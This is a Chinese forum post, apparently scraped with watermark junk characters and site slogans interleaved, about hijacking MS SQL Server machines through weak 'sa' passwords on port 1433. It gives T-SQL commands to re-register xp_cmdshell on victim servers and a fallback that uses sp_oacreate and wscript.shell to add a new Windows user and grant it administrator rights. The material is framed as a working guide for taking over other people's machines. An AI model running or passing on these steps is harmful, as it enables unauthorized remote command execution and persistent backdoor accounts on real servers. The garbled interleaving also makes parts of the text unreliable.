SQL弱口令1433抓鸡遇到问题
扫到SQL弱口令后利用SQLTOOLS出现未能找到存储过程 'master..xp_cmdshell'
9 M! d5 Q9 B; d7 |7 r4 K. }电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站这种情况的主要原因是删除了扩展存储过过程xp_cmdshell,有一个恢复的办法,如果不成功说明被改名了www.520diannao.com2 v" R4 K5 O7 H) s
8 ]! g% V6 Y. h0 z
使用SQLTOOLS连接,连接后在利用目录下点执行数据库命令,执行:我爱电脑技术论坛, Q& L% b8 O7 z# p+ x9 S; [
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站3 D6 T- o" o n% O% i
运气好的话就成功了,如果你想让你的肉鸡用SQL执行不了DOS命令的话,执行:
. k: T+ h) [% ^2 m4 K- @我爱电脑技术社区--打造最好的电脑技术自学交流平台sp_dropextendedproc "xp_cmdshell", r7 p( B2 ?# S+ r
就执行不了DOS命令了,当然用上面的语句可以复原。我爱电脑技术论坛$ P+ e- V* U! ]" Q
打造最好的电脑自学交流论坛* h6 f" G1 ~; F3 ?! C4 O, T% k
用SQLTOOLS可以连接成功,执行DOS命令,却总是显示这个、、、拒绝了对对象 'xp_cmdshell'(数据库 'master',所有者 'dbo')的 EXECUTE 权限。
. X* V, l7 u' Y9 A$ {( @7 ~ [* r2 u怎么解决????
% y) o8 `7 b. b( G我爱电脑技术社区--打造最好的电脑技术自学交流平台上传文件也不行。。。
( ?% B' }5 t5 p2 p1 未能找到存储过程'master..xpcmdshell'。
/ M- K7 B. D) H" z5 q& T5 e) t我爱电脑技术论坛
& I% j+ t$ T$ I7 f恢复方法:查询分离器连接后,电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站 b+ U" D' A' t1 N7 s0 S9 i
: }8 Z, b2 u. u8 Q, Q4 ]" h% H第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int,
! [4 N$ X* D% E8 U8 Z/ F5 E+ z# g电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll',我爱电脑技术社区--打造最好的电脑技术自学交流平台3 Q" C B2 T7 ~
然后按F5键命令执行完毕。
9 P8 _& \. v. x7 {6 e& c我爱电脑技术论坛我爱电脑技术社区--打造最好的电脑技术自学交流平台8 ]4 f- Q0 L9 ~9 ^9 p/ T! l# a) [
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。)
4 d# J) t- a" S. R# Q8 [9 N) F/ {电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
1 M# S! }3 Z- U+ @7 c4 H9 _% }www.520diannao.com恢复方法:查询分离器连接后,电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站. ~, z. |" `& ?) K
www.520diannao.com9 t( T& L2 ^/ @! f8 N
第一步执行:sp_dropextendedproc "xp_cmdshell",我爱电脑技术社区--打造最好的电脑技术自学交流平台9 O/ r) ^" }( m+ p
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2 `- p* i i" C* f8 w电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站然后按F5键命令执行完毕。我爱电脑技术论坛0 Z- K' K/ g- G- V9 r6 p3 }. N
* W. X1 |+ s1 v6 Q$ S, i
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)我爱电脑技术论坛5 c2 N" @" g4 d1 N+ O' G
, v' l" k4 U+ ]% ~恢复方法:查询分离器连接后,9 R/ H5 g' h) p4 _9 M
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站 Q2 p# Q3 s, z( A C
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'我爱电脑技术社区--打造最好的电脑技术自学交流平台0 Q5 T) k! ]6 |* i, c4 ^# Q
然后按F5键命令执行完毕。
9 I% L* T! z1 [% A. z H打造最好的电脑自学交流论坛www.520diannao.com# p9 A. I9 ]( J4 O& i) [2 D
四.终极方法:打造最好的电脑自学交流论坛: h: g& u1 A! X$ H* A- v& \
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站9 g: o9 ?, A# p/ u P
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站' ]) k9 q2 C7 T7 D) @4 E
( M" j U" z# _6 K) I
查询分离器连接后,打造最好的电脑自学交流论坛% s: e5 ?3 r9 B
/ O7 |: o% R& d3 n7 U" n' u我爱电脑技术社区--打造最好的电脑技术自学交流平台2000servser系统:打造最好的电脑自学交流论坛% E, Q: h# ?6 M- B
4 h; V- K/ T. R2 D! o ~我爱电脑技术论坛declare @shell int exec sp_oacreate 'wscript.shell',@shell output打造最好的电脑自学交流论坛# e0 E9 z7 {' t6 H4 R
exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
5 W$ @0 {8 p* i% G) W7 Y; i电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
" _0 T. x( J* ~2 g我爱电脑技术社区--打造最好的电脑技术自学交流平台declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod打造最好的电脑自学交流论坛+ [) H. r+ c3 H; T5 j" [
@shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
' Y& `2 ^6 t+ C, x# }我爱电脑技术社区--打造最好的电脑技术自学交流平台电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站4 L- w: f% s) x0 t( z# N2 J; P1 {3 f
xp或2003server系统:
+ d. t1 I8 q& R* z我爱电脑技术论坛打造最好的电脑自学交流论坛+ y4 k) t# c3 i, y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod9 |& A. C2 K) U3 y& `; b
@shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'我爱电脑技术社区--打造最好的电脑技术自学交流平台% {4 C# }7 y* X: o' {! i6 U; N
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
7 b- Z+ S5 c$ t6 o5 L" N0 ?@shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
7 m$ P" Q: c: I1 _- |电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
1 D3 x: H, i0 M. C我爱电脑技术论坛还不行就没办法了
